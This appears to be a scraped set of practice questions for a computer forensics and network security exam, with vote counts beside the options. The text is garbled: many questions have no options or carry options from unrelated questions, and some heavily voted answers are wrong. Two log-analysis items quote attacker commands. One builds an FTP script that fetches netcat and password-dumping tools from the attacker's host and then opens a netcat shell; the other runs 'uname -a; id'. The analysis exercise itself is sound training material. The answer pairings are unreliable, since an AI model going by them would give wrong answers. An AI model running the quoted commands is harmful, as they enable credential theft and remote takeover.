FCNS Soalan
FCNS Soalan
FCNS Soalan
It has been discovered that a former member of the IT department who switched to the development
team still has administrative access to many major network infrastructure devices and servers. Which
of the following mitigation techniques should be implemented to help reduce the risk of this event
recurring?
77 A. DLP
414 B. Incident management and response policy
437 C. Change management notifications
377 D. Regular user permission and rights reviews
2. 2.
In a computer forensics investigation, what describes the route that evidence takes from the time you
find it until the case is closed or goes to court?
A honey pot deployed with the IP 172.16.1.108 was compromised by an attacker . Given below is an
excerpt from a Snort binary capture of the attack. Decipher the activity carried out by the attacker by
studying the log. Please note that you are required to infer only what is explicit in the excerpt. (Note:
The student is being tested on concepts learnt during passive OS fingerprinting, basic TCP/IP
connection concepts and the ability to read packet signatures from a sniff dump.) 03/15-
20:21:24.107053 211.185.125.124:3500 -> 172.16.1.108:111 TCP TTL:43 TOS:0x0 ID:29726
IpLen:20 DgmLen:52 DF ***A**** Seq: 0x9B6338C5 Ack: 0x5820ADD0 Win: 0x7D78 TcpLen: 32
TCP Options (3) => NOP NOP TS: 23678634 2878772
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= 03/15-
20:21:24.452051 211.185.125.124:789 -> 172.16.1.103:111 UDP TTL:43 TOS:0x0 ID:29733
IpLen:20 DgmLen:84 Len: 64 01 0A 8A 0A 00 00 00 00 00 00 00 02 00 01 86 A0 ................ 00 00 00
02 00 00 00 03 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 01 86 B8 00 00 00 01
................ 00 00 00 11 00 00 00 00 ........
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= 03/15-
20:21:24.730436 211.185.125.124:790 -> 172.16.1.103:32773 UDP TTL:43 TOS:0x0 ID:29781
IpLen:20 DgmLen:1104 Len: 1084 47 F7 9F 63 00 00 00 00 00 00 00 02 00 01 86 B8 G..c............ 00
00 00 01 00 00 00 01 00 00 00 01 00 00 00 20 ............... 3A B1 5E E5 00 00 00 09 6C 6F 63 61 6C
68 6F 73 :.^.....localhost
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= +
03/15-20:21:36.539731 211.185.125.124:4450 -> 172.16.1.108:39168 TCP TTL:43 TOS:0x0
ID:31660 IpLen:20 DgmLen:71 DF ***AP*** Seq: 0x9C6D2BFF Ack: 0x59606333 Win: 0x7D78
TcpLen: 32 TCP Options (3) => NOP NOP TS: 23679878 2880015 63 64 20 2F 3B 20 75 6E 61 6D
65 20 2D 61 3B 20 cd /; uname -a; 69 64 3B id;
What file structure database would you expect to find on floppy disks?
114 A. NTFS
132 B. Fat 32
81 C. Fat 16
975 D. FAT 12
5. 5.
When examining a file with a Hex Editor, what space does the file header occupy?
306 A. number of circles x number of halves x number of sides x 512 bytes per sector
407 B. The answers is wrong
127 C. number of cells x number of heads x number of sides x 512 bytes per sector
463 D. number of cylinders x number of halves x number of shims x 512 bytes per sector and
number of cylinders x number of halves x number of shims x 512 bytes per sector number of
cylinders x number of halves x number of shims x 512 bytes per sector
7. 7.
A suspect is accused of violating the acceptable use of computing resources, as he has visited adult
websites and downloaded images. The investigator wants to demonstrate that the suspect did indeed
visit these sites. However, the suspect has cleared the search history and emptied the cookie cache.
Moreover, he has removed any images he might have downloaded. What can the investigator do to
prove the violation? Choose the most feasible option.
Which part of the Windows Registry contains the user's password file?
773 A. HKEY_LOCAL_MACHINE
70 B. HKEY_CURRENT_CONFIGURATION
237 C. HKEY_USER
222 D. HKEY_CURRENT_USER
9. 9.
Which of the following are a benefit of removing unused or unneeded services and protocols?
The component of a DDoS attack that sends commands to DDoS zombie agents is known as a
_____.
Which of the following is a weakness in WEP related to the IV? (Select all that apply)
246 A. The IV is a static value, which makes it relatively easy for an attacker to brute force the
WEP key from captured traffic
549 B. The IV is transmitted in plaintext and can be easily seen in captured traffic
426 C. The IV is only 24 bits in size, which makes it possible that two or more data frames will
be trasmitted with the same IV, thereby resulting in an IV collision that an attacker can use to
determine information about the network
80 D. There is no weakness in WEP related to the IV
12. 12.
You are creating a DMZ for a company and need to allow eternal users to access Web servers in the
DMZ using HTTP/S as well as allow internal users to access the same Web firewalls to meet these
requirements
175 A. Open port 80 on the external firewall and port 443 on the internal firewall
811 B. Open port 443 on the external firewall and port 80 on the internal firewall
120 C. Open port 80 on the external firewall and port 110 on the internal firewall
198 D. Open port 110 on the external firewall and port 80 on the internal firewall
13. 13.
When you use Java, the JVM isolates the Java applet to a sandbox when it executes. What does this
do to provide additional security
98 A. This prevents the Java applet from accessing data on the client's hard drive
286 B. This prevents the Java applet from communicationg to servers other than the one from
which it was downloaded
119 C. This prevents the Java applet from failing in such a way ta=hat the Java applet is
unable to execute
799 D. This prevents the Java applet from failing in such a way that it affects another
application
14. 14.
You are setting up a test plan for verifying thta new code being placed on a Web server is secure and
does not cause any problems with the production Web server. What is the best way to test the code
prior to deploying it to the production Web server?
141 A. Test all new code on a development PC prior to transferring it to the production Web
server
297 B. Test all new code on an active internal Web sever prior to transferring it to the
production web server
600 C. Test all new code on a duplicate web server prior to transferring it to the production
web server
266 D. Test all new code on another user's PC prior to transferring it to the production web
server
15. 15.
To allow its employees remote access to the corporate network, a company has implemented a
hardware VPN solution. Why is this considered a secure remote access solution?
221 A. Because only the company's employees will know the address to connect to in order
to use the VPN
101 B. Because VPNs use the internet to transfer data
111 C. Because a VPNs uses compression to make its data secure
870 D. Because a VPNs uses encryption to make its data secure
16. 16.
The network team at your company has placed a sniffer on the network to analyze an ongoing
network-related problem. The team connects to the sniffer using Telnet to view the data going
accross the network. What would you recommend to increase the security of this connection without
making it significantly more difficult for the network team members to do their jobs?
643 A. TCP/IP
108 B. DNS
529 C. MPPE
21 D. AppleTalk
18. 18.
Sally has come to you for advice and guidance. She is trying to configure a network device to block
attempts to connect on certain ports, but when she finishes the configuration, it works for a period of
time but them changes back to the original configuration. She cannot understand why the setting
continue to change back. When you examine the configuration, you find that the _______ are
incorrect, and are allowing Bob to change the configuration, although he is not supposed to operate
or configure this device. Since he did not know avout Sally, he kept changing the configuration back.
Josh has asked for a clerification of what a firmware update is. How could you briefly describe for him
the purpose of firmware updates? (Pick the best answer)
1087 A. Firmware updates are control software- or BIOS-type updates that are installed to
improve the functionality or extend the life of the device involved
116 B. Firmware updates are device-spesific command sets that must be upgrade to continue
operation
56 C. Firmware updates update the mechanical function of the device
40 D. Firmware updates ate minor fixes, and are not usually necessary
20. 20.
When an investigator contacts by telephone the domain administrator or controller listed by a whois
lookup to request all e-mails sent and received for a user account be preserved, what U.S.C. statute
authorizes this phone call and obligates the ISP to preserve e-mail records?
Before you are called to testify as an expert, what must an attorney do first?
An employee is attempting to wipe out data stored on a couple of compact discs (CDs) and digital
video discs (DVDs) by using a large magnet. You inform him that this method will not be effective in
wiping out the data because CDs and DVDs are______________ media used to store large amounts
of data and are not affected by the magnet.
51 A. logical
90 B. anti-magnetic
87 C. magnetic
1075 D. optical
25. 25.
Lance wants to place a honeypot on his network. Which of the following would be your
recommendations?
89 A. All forms should be placed in an approved secure container because they are now
primary evidence in the case.
902 B. The multi-evidence form should be placed in the report file and the single-evidence
forms should be kept with each hard drive in an approved secure container.
228 C. The multi-evidence form should be placed in an approved secure container with the
hard drives and the single-evidence forms should be placed in the report file.
82 D. All forms should be placed in the report file because they are now primary evidence in
the case.
28. 28.
E-mail log does not contain which of the following information to help you in your investigation?
(Select up to 4)
In what way do the procedures for dealing with evidence in a criminal case differ from the procedures
for dealing with evidence in a civil case?
83 A. evidence must be handled in the same way regardless of the type of case
72 B. evidence procedures are not important unless you work for a law enforcement agency
1019 C. evidence in a criminal case must be secured more tightly than in a civil case
127 D. evidence in a civil case must be secured more tightly than in a criminal case
31. 31.
You are assigned to work in the computer forensics lab of a state police agency. While working on a
high profile criminal case, you have followed every applicable procedure, however your boss is still
concerned that the defense attorney might question weather evidence has been changed while at the
lab. What can you do to prove that the evidence is the same as it was when it first entered the lab?
1162 A. make an MD5 hash of the evidence and compare it with the original MD5 hash that
was taken when the evidence first entered the lab
69 B. make an MD5 hash of the evidence and compares it to the standard database
developed by NIST
17 C. there is no reason to worry about this possible claim because state labs are certified
54 D. sign a statement attesting that the evidence is the same as it was when it entered the
lab
32. 32.
When monitoring for both intrusion and security events between multiple computers, it is essential
that the computers' clocks are synchronized. Synchronized time allows an administrator to
reconstruct what took place during an attack against multiple computers. Without synchronized time,
it is very difficult to determine exactly when specific events took place, and how events interlace.
What is the name of the service used to synchronize time among multiple computers?
When investigating a potential e-mail crime, what is your first step in the investigation?
What happens when a file is deleted by a Microsoft operating system using the FAT file system?
1094 A. only the reference to the file is removed from the FAT
73 B. the file is erased and cannot be recovered
44 C. a copy of the file is stored and the original file is erased
90 D. the file is erased but can be recovered
35. 35.
The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported
Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability
(UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to
run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini. He
then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to
construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server.
He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is
functioning correctly. The attacker makes a RDS query which results in the commands run as shown
below. "cmd1.exe /c open 213.116.251.162 >ftpcom" "cmd1.exe /c echo johna2k >>ftpcom"
"cmd1.exe /c echo haxedj00 >>ftpcom" "cmd1.exe /c echo get nc.exe >>ftpcom" "cmd1.exe /c echo
get pdump.exe >>ftpcom" "cmd1.exe /c echo get samdump.dll >>ftpcom" "cmd1.exe /c echo quit
>>ftpcom" "cmd1.exe /c ftp -s:ftpcom" "cmd1.exe /c nc -l -p 6969 -e cmd1.exe" What can you infer
from the exploit given?
What term is used to describe a cryptographic technique for embedding information into something
else for the sole purpose of hiding that information from the casual observer?
45 A. rootkit
198 B. key escrow
1030 C. steganography
31 D. Offset
37. 37.
During the course of an investigation, you locate evidence that may prove the innocence of the
suspect of the investigation. You must maintain an unbiased opinion and be objective in your entire
fact finding process. Therefore you report this evidence. This type of evidence is known as:
99 A. Inculpatory evidence
187 B. mandatory evidence
953 C. exculpatory evidence
63 D. Terrible evidence
38. 38.
Corporate investigations are typically easier than public investigations because ...
866 A. MIME
114 B. UuenCode
152 C. IMAP
173 D. SMTP
40. 40.
If you plan to startup a suspect's computer, you must modify the ___________ to ensure that you do
not contaminate or alter data on the suspect's hard drive by booting to the hard drive.
42 A. deltree command
679 B. CMOS
459 C. Boot sys
124 D. Scandisk utility
41. 41.
684 A. particularly describe the place to be searched and particularly describe the items to be
seized
246 B. generally describe the place to be searched and particularly describe the items to be
seized
163 C. generally describe the place to be searched and generally describe the items to be
seized
204 D. particularly describe the place to be searched and generally describe the items to be
seized
42. 42.
If a suspect computer is located in an area that may have toxic chemicals, you must:
Which is the most important reason for the removal of unused, unnecessary, or unneeded protocols,
services, andapplications?
The act of attempting to appear to be someone you’re not in order to gain access to a system is
known as which of the following?
1096 A. Spoofing
81 B. DDoS
36 C. Replay
89 D. Sniffing
45. 45.
Which of the following is most likely to make systems vulnerable to MITM attacks?
Which of the following is the best way to protect your organization from revealing sensitive
information through dumpster diving?
The use of VPNs and _______ have enabled users to be able to telecommute
807 A. PGP
36 B. S/MIME
185 C. Wireless NICs
273 D. RASs
48. 48.
PDAs, cell phones, and certain network cards have the ability to use _______ networks. Choose the
BEST answer
20 A. Wired
805 B. Private
465 C. Wireless
12 D. Antique
49. 49.
There are three recognize levels of hacking ability in the internet community. The first is the skilled
hacker, who writes the programs and scripts that script kiddies use for their attacks. Next comes the
script kiddie, who knows how to run the scripts written by the skilled hackers. After the script kiddies
come the _______, who lack the basic knowledge of networks and security to lunch an attack
themselves
831 A. Web kiddies
79 B. Clickers
332 C. Click kiddies
58 D. Dunce kiddies
50. 50.